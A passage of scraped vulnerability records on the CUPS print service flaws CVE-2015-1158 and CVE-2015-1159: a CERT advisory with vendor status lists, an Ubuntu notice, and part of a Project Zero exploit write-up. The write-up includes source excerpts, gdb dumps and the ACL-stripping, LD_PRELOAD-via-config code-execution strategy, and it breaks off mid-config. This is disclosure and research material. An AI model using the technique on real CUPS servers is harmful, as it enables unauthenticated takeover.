\n\n[**CWE-911**](<http://cwe.mitre.org/data/definitions/911.html>)**: Improper Update of Reference Count - **CVE-2015-1158\n\nAn issue with how localized strings are handled in `cupsd` allows a reference counter to over-decrement when handling certain print job request errors. As a result, an attacker can prematurely free an arbitrary string of global scope, creating a dangling pointer to a repurposed block of memory on the heap. The dangling pointer causes ACL verification to fail when parsing `'admin/conf'` and` ``'admin'` ACLs. The ACL handling failure results in unrestricted access to privileged operations, allowing an unauthenticated remote user to upload a replacement CUPS configuration file and mount further attacks. \n \nThis vulnerability was introduced in CUPS 1.2.0, released in 2006. All major versions of CUPS from 1.2 to 2.0 are vulnerable. This vulnerability is exploitable by default and without any special permissions other than the ability to send a print job request. \n \n[**CWE-79**](<http://cwe.mitre.org/data/definitions/79.html>)**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CVE-2015-1159 \n \nA cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web._ _In certain cases, the CGI template can echo user input to file rather than escaping the text first. This may be used to set up a reflected XSS attack in the QUERY parameter of the web interface help page. By default, many linux distributions run with the web interface activated; OS X has the web interface deactivated by default. \n \nThe CVSS score below is based on CVE-2015-1158. \n \n--- \n \n### Impact \n\nCVE-2015-1158 may allow a remote unauthenticated attacker access to privileged operations on the CUPS server. CVE-2015-1159 may allow an attacker to execute arbitrary javascript in a user's browser. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nA [patch](<http://www.cups.org/blog.php?L1082+I0+Q>) addressing these issues has been released for all supported versions of CUPS. For the version 2.0 branch (the latest release), 2.0.3 contains the patch. Affected users are encouraged to update as soon as possible. \n \n--- \n \n### Vendor Information\n\n810572\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Affected\n\nNotified: May 06, 2015 Updated: May 08, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD Project __ Affected\n\nNotified: May 08, 2015 Updated: June 10, 2015 \n\n**Statement Date: June 10, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nFreeBSD ships with CUPS in ports tree and was therefore affected.\n\nAn update was done on Jun 9 22:15:48 2015 UTC (r389006).\n\n### SUSE Linux __ Affected\n\nNotified: May 08, 2015 Updated: June 10, 2015 \n\n**Statement Date: June 10, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSLE 12 is affected and will receive an update soon. \nSLE 11 is affected and will receive an update soon.\n\n### Vendor References\n\n * <https://bugzilla.suse.com/show_bug.cgi?id=924208>\n\n### openSUSE project __ Affected\n\nNotified: May 08, 2015 Updated: June 10, 2015 \n\n**Statement Date: June 10, 2015**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nopenSUSE 13.1 and 13.2 are affected and will receive updates soon.\n\n### Vendor References\n\n * <https://bugzilla.opensuse.org/show_bug.cgi?id=924208>\n\n### CentOS Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Debian GNU/Linux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DesktopBSD Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### DragonFly BSD Project Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### EMC Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### F5 Networks, Inc. Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hewlett-Packard Company Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Hitachi Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### IBM eServer Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Juniper Networks Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Mandriva S. A. Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### NetBSD Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Nokia Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OmniTI Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### OpenBSD Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Oracle Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### QNX Software Systems Inc. Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Red Hat, Inc. Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Ubuntu Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Unisys Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: May 08, 2015 Updated: May 08, 2015 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 32 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.cups.org/blog.php?L1082+I0+Q>\n * <https://www.cups.org/str.php?L4609>\n\n### Acknowledgements\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-1158](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-1158>), [CVE-2015-1159](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-1159>) \n---|--- \n**Date Public:** | 2015-06-08 \n**Date First Published:** | 2015-06-09 \n**Date Last Updated: ** | 2015-06-10 18:34 UTC \n**Document Revision: ** | 43 \n", "modified": "2015-06-10T18:34:00", "published": "2015-06-09T00:00:00", "id": "VU:810572", "href": "https://www.kb.cert.org/vuls/id/810572", "type": "cert", "title": "CUPS print service is vulnerable to privilege escalation and cross-site scripting", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "It was discovered that CUPS incorrectly handled reference counting when \nhandling localized strings. A remote attacker could use this issue to \nescalate permissions, upload a replacement CUPS configuration file, and \nexecute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a cross-site \nscripting issue. A remote attacker could use this issue to bypass default \nconfiguration settings. (CVE-2015-1159)", "edition": 5, "modified": "2015-06-10T00:00:00", "published": "2015-06-10T00:00:00", "id": "USN-2629-1", "href": "https://ubuntu.com/security/notices/USN-2629-1", "title": "CUPS vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:39:56", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "description": "Peter De Wachter discovered that CUPS incorrectly handled certain malformed \ncompressed raster files. A remote attacker could use this issue to cause \nCUPS to crash, resulting in a denial of service, or possibly execute \narbitrary code.", "edition": 5, "modified": "2015-02-26T00:00:00", "published": "2015-02-26T00:00:00", "id": "USN-2520-1", "href": "https://ubuntu.com/security/notices/USN-2520-1", "title": "CUPS vulnerability", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:20", "bulletinFamily": "info", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Guest posted by Neel Mehta (nmehta@google.com) - June 19th, 2015\n\n# Abstract\n\n \n\n\nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers.\n\n \n\n\nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation.\n\n \n\n\nIn this blog post, I describe an exploit chain for several bugs I discovered in [CUPS](<https://www.cups.org/>), an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation.\n\n \n\n\nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same.\n\n# Summary\n\n \n\n\nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code.\n\n \n\n\nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface.\n\n \n\n\nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations.\n\n# Background\n\n \n\n\n## What is CUPS?\n\n \n\n\n[CUPS](<http://www.cups.org/>) is a modular, feature-rich open-source printing system for Unix-based OS's. It abstracts the internals of printing a multitude of file formats on a multitude of printer hardware, reducing the need for printer-specific drivers.\n\n \n\n\nCUPS is maintained by Apple, and runs on Linux, BSD, and variant OS's like Mac OS X. It is widely-deployed on desktops, laptops, network print servers, and even some embedded systems. CUPS is the reference implementation for [IPP/2.0 and IPP/2.1](<http://en.wikipedia.org/wiki/Internet_Printing_Protocol>), the latest replacement for LPD / LPR printing. The source tree for CUPS is large and complex, but not uniquely so, at more than 100,000 lines of ANSI C.\n\n## CUPS String Allocation Internals\n\n \n\n\nCUPS makes widespread use of strings with managed-code-like properties. These strings are allocated by '_cupsStrAlloc()' (see cups/string.c:50), which is used like 'strdup(3)', with one fundamental difference: strings are de-duplicated by content and reference counted.\n\n \n\n\nStrings are owned by a global hash table (a 'cups_array_t' / '_cups_array_s' structure, defined in cups/array.c:39). '_cupsStrAlloc()' first checks the hash table for its input string (by content). If the string is in the hash table, it has been previously allocated, and its reference count is incremented. The existing string pointer (from the global array) is returned. If not found in the global hash table, a new heap block is allocated and populated, then inserted with a single reference.\n\n \n\n\nTo be clear, if two disparate functions call '_cupsStrAlloc()' for the same string content, they each get and share the same pointer to a single heap block.\n\n \n\n\nWhen a string is allocated by '_cupsStrAlloc()', it must be released by a call to '_cupsStrFree()' (see cups/string.c:289). This function decrements the reference count, and if none remain it removes the string from the global hash table and frees the block, releasing it back to the allocator. '_cupsStrFree()' ignores pointers that aren't in the global hash table. This is fortuitous for exploitation, turning a historical vanilla double-free into a fault-resistant exploit primitive with global, content-targeted scope.\n\n \n\n\n# Reference Count Over-Decrement Issue\n\n \n\n\n## Proper IPP Attribute Teardown\n\n \n\n\nIPP attributes are name-value pairs. They are typed (bool, integer, date, string, etc...), and can be organized in groups. Attributes can have multiple values (one name, associated with multiple values). Attribute types 'IPP_TAG_TEXTLANG' and 'IPP_TAG_NAMELANG' are localized. The character set for these attributes is specified once in the wire protocol, even when the attribute has multiple values (ie all values in the group use the charset).\n\n \n\n\nCups saves attributes in an 'ipp_attribute_t' / '_ipp_attribute_s' structure:\n\n \n\n\ncups/ipp.h:674:\n\ntypedef struct _ipp_attribute_s ipp_attribute_t;\n\n \n\n\ncups/ipp.h:789:\n\nstruct _ipp_attribute_s /**** Attribute ****/\n\n{\n\nipp_attribute_t *next; /* Next attribute in list */\n\nipp_tag_t group_tag, /* Job/Printer/Operation group tag */\n\nvalue_tag; /* What type of value is it? */\n\nchar *name; /* Name of attribute */\n\nint num_values; /* Number of values */\n\n_ipp_value_t values[1]; /* Values */\n\n};\n\n \n\n\nThe 'values' structure member holds a minimum of a single value. For multiple attributes, 'next' points to another attribute structure, containing the next value.\n\n \n\n\n'_ipp_value_t' is defined as:\n\n \n\n\ncups/ipp.h:751:\n\n \n\n\ntypedef union _ipp_value_u /**** Attribute Value ****/\n\n{\n\n<portions omitted>\n\n \n\n\nstruct\n\n{\n\nchar *language; /* Language code */\n\nchar *text; /* String */\n\n} string; /* String with language value */\n\n \n\n\n<portions omitted>\n\n \n\n\n} _ipp_value_t;\n\ntypedef _ipp_value_t ipp_value_t; /**** Convenience typedef that will be removed @private@ ****/\n\n \n\n\nIPP requests are made up of groups of attributes, sent in an HTTP request body. When cupsd receives a request, it parses all attribute groups in the request immediately, storing them all in an 'ipp_t' structure (defined in cups/ipp.h:799). String attributes are added to this structure by\n\n'ippAddStrings()'. For multi-value localized string attributes, the first value's '_ipp_value_t.string.language' field is populated by '_cupsStrAlloc()' (which ups the refcount once).\n\n \n\n\nIn a quirky but sweet \"academic\" implementation choice, subsequent values have their '_ipp_value_t.string.language' field shallow-copied from the first value (the refcount is not increased). This mirrors a design choice in the wire protocol, whereby IPP saves bytes on the wire by including the charset only once for a group of values.\n\n \n\n\ncups/ipp.c:1316:\n\n \n\n\n/*\n\n* Initialize the attribute data...\n\n*/\n\n \n\n\nfor (i = num_values, value = attr->values;\n\ni > 0;\n\ni --, value ++)\n\n{\n\nif (language)\n\n{\n\nif (value == attr->values)\n\n{\n\nif ((int)value_tag & IPP_TAG_CUPS_CONST)\n\nvalue->string.language = (char *)language;\n\nelse\n\nvalue->string.language = _cupsStrAlloc(ipp_lang_code(language, code, \u2190 increases refcount\n\nsizeof(code)));\n\n}\n\nelse\n\nvalue->string.language = attr->values[0].string.language; \u2190 shallow copy\n\n}\n\n \n\n\nTo free this type of attribute correctly, '_cupsStrFree()' should be called once, on the first value's 'string.language' pointer.. IPP attributes are usually freed by a purpose-built routine 'ippDeleteAttribute()', which calls 'ipp_free_values()' to free the language correctly:\n\n \n\n\ncups/ipp.c:6480:\n\n \n\n\nswitch (attr->value_tag)\n\n{\n\ncase IPP_TAG_TEXTLANG :\n\ncase IPP_TAG_NAMELANG :\n\nif (element == 0 && count == attr->num_values &&\n\nattr->values[0].string.language)\n\n{\n\n_cupsStrFree(attr->values[0].string.language); \u2190 release language only once here\n\nattr->values[0].string.language = NULL;\n\n}\n\n/* Fall through to other string values */\n\n \n\n\ncase IPP_TAG_TEXT :\n\ncase IPP_TAG_NAME :\n\ncase IPP_TAG_RESERVED_STRING :\n\ncase IPP_TAG_KEYWORD :\n\ncase IPP_TAG_URI :\n\ncase IPP_TAG_URISCHEME :\n\ncase IPP_TAG_CHARSET :\n\ncase IPP_TAG_LANGUAGE :\n\ncase IPP_TAG_MIMETYPE :\n\nfor (i = count, value = attr->values + element; \u2190 for subsequent values, don't free language again\n\ni > 0;\n\ni --, value ++)\n\n{\n\n_cupsStrFree(value->string.text);\n\nvalue->string.text = NULL;\n\n}\n\nbreak;\n\n \n\n\n## Improper Teardown - Reference Count Over-Decrement (CVE-2015-1158)\n\n \n\n\nWhen freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'.\n\n \n\n\nscheduler/ipp.c:1626:\n\n \n\n\n/*\n\n* Free old strings\u2026 \u2190 Even 'old' strings need to be freed.\n\n*/\n\n \n\n\nfor (i = 0; i < attr->num_values; i ++)\n\n{\n\n_cupsStrFree(attr->values[i].string.text);\n\nattr->values[i].string.text = NULL;\n\nif (attr->values[i].string.language) \u2190 for all values in an attribute\n\n{\n\n_cupsStrFree(attr->values[i].string.language); \u2190 free the 'language' string\n\nattr->values[i].string.language = NULL;\n\n}\n\n}\n\n \n\n\nIn this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request.\n\n \n\n\nTo specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times.\n\n \n\n\nThe over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations.\n\n \n\n\nDangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build.\n\n \n\n\n# Exploit Strategy\n\n \n\n\n## ACL Implementation\n\n \n\n\nCupsd allows the main configuration file to be remotely changed via an HTTP PUT request to '/admin/conf/cupsd.conf'. This is a privileged operation, protected by an ACL in the default configuration file:\n\n \n\n\ncupsd.conf:\n\n \n\n\n# Restrict access to the admin pages...\n\n<Location /admin>\n\nOrder allow,deny\n\n</Location>\n\n \n\n\n# Restrict access to configuration files...\n\n<Location /admin/conf>\n\nAuthType Default\n\nRequire user @SYSTEM\n\nOrder allow,deny\n\n</Location>\n\n \n\n\nThis 'Location' directive is stored in a global array 'Locations', which is an array of 'cupsd_location_t' structures:\n\n \n\n\nscheduler/auth.h:89:\n\n \n\n\ntypedef struct\n\n{\n\nchar *location; /* Location of resource */\n\nsize_t length; /* Length of location string */\n\nipp_op_t op; /* IPP operation */\n\nint limit, /* Limit for these types of requests */\n\norder_type, /* Allow or Deny */\n\ntype, /* Type of authentication */\n\nlevel, /* Access level required */\n\nsatisfy; /* Satisfy any or all limits? */\n\ncups_array_t *names, /* User or group names */\n\n*allow, /* Allow lines */\n\n*deny; /* Deny lines */\n\nhttp_encryption_t encryption; /* To encrypt or not to encrypt... */ \u2190 Very existential :)\n\n} cupsd_location_t;\n\n \n\n\nThe 'location' field in each structure holds the path from the 'Location' configuration directive, and fortuitously happens to be a reference counted string.\n\n \n\n\nCUPS matches requests to a 'Location' ACL via 'cupsdFindBest()', which searches for the 'Location' directive that matches the largest canonical portion of the requested path. For example, a 'PUT /admin/conf/cupsd.conf' would match the 'Location' '/admin/conf' better than '/admin', and fall under that (in this case more-restrictive) ACL. If the 'Location' directive for '/admin/conf' didn't exist, the request would instead match the less-specific 'Location' ACL for '/admin', or eventually simply a default ACL for '/'.\n\n \n\n\nThe fidelity of string content for 'Location' directives is important, perhaps.\n\n## Use of the Basic Exploit Primitive\n\n \n\n\nI use our basic exploit primitive to target the 'location' path strings in the two 'cupsd_location_t' structures for the above-mentioned 'Location' directives.\n\n \n\n\nI over-decrement reference counts on strings '/admin/conf' and '/admin'. The 'location' pointers in the 'cupsd_location_t' remain dangling, and point to different content when the block is re-used and overwritten.\n\n \n\n\nAs a result, the ACL's fail to match their intended requests. This allows unrestricted access to privileged operations, allowing an un-authenticated user to upload a replacement configuration file.\n\n \n\n\nHere's a gdb dump of the exploit leaking reference counts for '/admin/conf':\n\n \n\n\n(gdb) x/gx 0x7F0D577C7000+0x2639C0\n\n0x7f0d57a2a9c0 <Locations>: 0x00007f0d5980c8e0\n\n(gdb) x/64gx 0x00007f0d5980c8e0\n\n0x7f0d5980c8e0: 0x0000001000000003 0x0000000000000003\n\n0x7f0d5980c8f0: 0x0000000000000001 0x0000000000000000\n\n0x7f0d5980c900: 0x0000000000000000 0x0000000000000000\n\n<snip>\n\n0x7f0d5980d120: 0x0000000000000000 0x0000000000000051\n\n0x7f0d5980d130: 0x00007f0d5980d184 0x0000007f00000000\n\n0x7f0d5980d140: 0x0000000100000006 0x0000000000000000\n\n0x7f0d5980d150: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d160: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d170: 0x0000000000000000 0x0000000000000021\n\n0x7f0d5980d180: 0x6d64612f00000001 0x0000000000006e69\n\n0x7f0d5980d190: 0x0000000000000000 0x0000000000000051\n\n0x7f0d5980d1a0: 0x00007f0d5980d1f4 0x0000007f00000000 \u2190 Pointer to '/admin/conf' here.\n\n0x7f0d5980d1b0: 0x000000010000000b 0x00000001ffffffff\n\n0x7f0d5980d1c0: 0x0000000000000000 0x00007f0d5980d210\n\n0x7f0d5980d1d0: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d1e0: 0x0000000000000000 0x0000000000000021\n\n0x7f0d5980d1f0: 0x6d64612f00000001 0x00666e6f632f6e69\n\n0x7f0d5980d200: 0x0000000000000000 0x00000000000000e1\n\n<snip>\n\n(gdb) x/s 0x00007f0d5980d1f4\n\n0x7f0d5980d1f4: \"/admin/conf\"\n\n(gdb) x/20i 0x7F0D577C7000+0x12A10 \u2190 Reference count over-decrement code in 'add_job()'.\n\n0x7f0d577d9a10: movslq %r14d,%r12\n\n0x7f0d577d9a13: add $0x2,%r12\n\n0x7f0d577d9a17: shl $0x4,%r12\n\n0x7f0d577d9a1b: add %r15,%r12\n\n0x7f0d577d9a1e: mov 0x8(%r12),%rdi\n\n0x7f0d577d9a23: callq 0x7f0d577d3010 <_cupsStrFree@plt>\n\n0x7f0d577d9a28: mov (%r12),%rdi\n\n0x7f0d577d9a2c: movq $0x0,0x8(%r12)\n\n0x7f0d577d9a35: test %rdi,%rdi\n\n0x7f0d577d9a38: je 0x7f0d577d9a47\n\n0x7f0d577d9a3a: callq 0x7f0d577d3010 <_cupsStrFree@plt>\n\n0x7f0d577d9a3f: movq $0x0,(%r12)\n\n0x7f0d577d9a47: inc %r14d\n\n0x7f0d577d9a4a: jmp 0x7f0d577d9a4f\n\n0x7f0d577d9a4c: xor %r14d,%r14d\n\n0x7f0d577d9a4f: cmp %r14d,0x18(%r15)\n\n0x7f0d577d9a53: jg 0x7f0d577d9a10\n\n0x7f0d577d9a55: lea 0x38(%rbx),%rdi\n\n0x7f0d577d9a59: movl $0x42,0xc(%r15)\n\n0x7f0d577d9a61: movl $0x1,0x18(%r15)\n\n(gdb) b *0x7f0d577d9a10\n\nBreakpoint 1 at 0x7f0d577d9a10\n\n(gdb) c\n\nContinuing.\n\n \n\n\nBreakpoint 1, 0x00007f0d577d9a10 in ?? ()\n\n(gdb) display/i $rip\n\n1: x/i $rip\n\n=> 0x7f0d577d9a10: movslq %r14d,%r12\n\n(gdb) x/16gx $r15\n\n0x7f0d59b422b0: 0x00007f0d59b65ec0 0x0000003600000002\n\n0x7f0d59b422c0: 0x00007f0d59805f44 0x000000000000000d\n\n0x7f0d59b422d0: 0x00007f0d5980d1f4 0x00007f0d59a5a494 \u2190 The same pointer as found in 'Locations'\n\n0x7f0d59b422e0: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b422f0: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b42300: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b42310: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n0x7f0d59b42320: 0x00007f0d5980d1f4 0x00007f0d59a5a494\n\n(gdb) x/16gx 0x00007f0d5980d1f4-4\n\n0x7f0d5980d1f0: 0x6d64612f00000007 0x00666e6f632f6e69 \u2190 The current reference count is 7.\n\n0x7f0d5980d200: 0x0000000000000000 0x00000000000000e1\n\n0x7f0d5980d210: 0x0000001000000001 0x00000000ffffffff\n\n0x7f0d5980d220: 0x0000000000000001 0x0000000000000000\n\n0x7f0d5980d230: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d240: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d250: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d260: 0x0000000000000000 0x0000000000000000\n\n(gdb) b *0x7f0d577d9a55 \u2190 Break after end of loop, after reference count hits zero.\n\nBreakpoint 2 at 0x7f0d577d9a55\n\n(gdb) delete 1\n\n(gdb) c\n\nContinuing.\n\n \n\n\nBreakpoint 2, 0x00007f0d577d9a55 in ?? ()\n\n1: x/i $rip\n\n=> 0x7f0d577d9a55: lea 0x38(%rbx),%rdi\n\n(gdb) x/16gx 0x7f0d5980d1f0\n\n0x7f0d5980d1f0: 0x00007f0d59a5a2f0 0x00666e6f632f6e69 \u2190 Now a free list pointer (was refcount + string start).\n\n0x7f0d5980d200: 0x0000000000000000 0x00000000000000e1\n\n0x7f0d5980d210: 0x0000001000000001 0x00000000ffffffff\n\n0x7f0d5980d220: 0x0000000000000001 0x0000000000000000\n\n0x7f0d5980d230: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d240: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d250: 0x0000000000000000 0x0000000000000000\n\n0x7f0d5980d260: 0x0000000000000000 0x0000000000000000\n\n(gdb) x/s 0x7f0d5980d1f4\n\n0x7f0d5980d1f4: \"\\r\\177\" \u2190 Actual content unpredictable, but predictably not '/admin/conf'.\n\n(gdb) x/16bx 0x7f0d5980d1f0\n\n0x7f0d5980d1f0: 0xf0 0xa2 0xa5 0x59 0x0d 0x7f 0x00 0x00\n\n0x7f0d5980d1f8: 0x69 0x6e 0x2f 0x63 0x6f 0x6e 0x66 0x00\n\n(gdb) \u2190 PC LOAD LETTER\n\n \n\n\n# Code Execution Via Changes to 'cupsd.conf'\n\n \n\n\n## SetEnv Directives\n\n \n\n\nAfter using the basic exploit primitive to strip ACL's, I can now specify an arbitrary new configuration file for cupsd. To run arbitrary code via configuration changes, I use the 'SetEnv' directive. Cupsd invokes CGI applications for certain requests, and the 'SetEnv' directive allows us to set arbitrary environment variables for these CGI processes.\n\n \n\n\nFor MacOS X targets, we use the 'DYLD_INSERT_LIBRARIES' environment variable to load a library off disk into cups CGI requests. On Linux targets, I use the equivalent, 'LD_PRELOAD':\n\n \n\n\nLogLevel debug2\n\nListen *:631\n\nDefaultAuthType None\n\nWebInterface 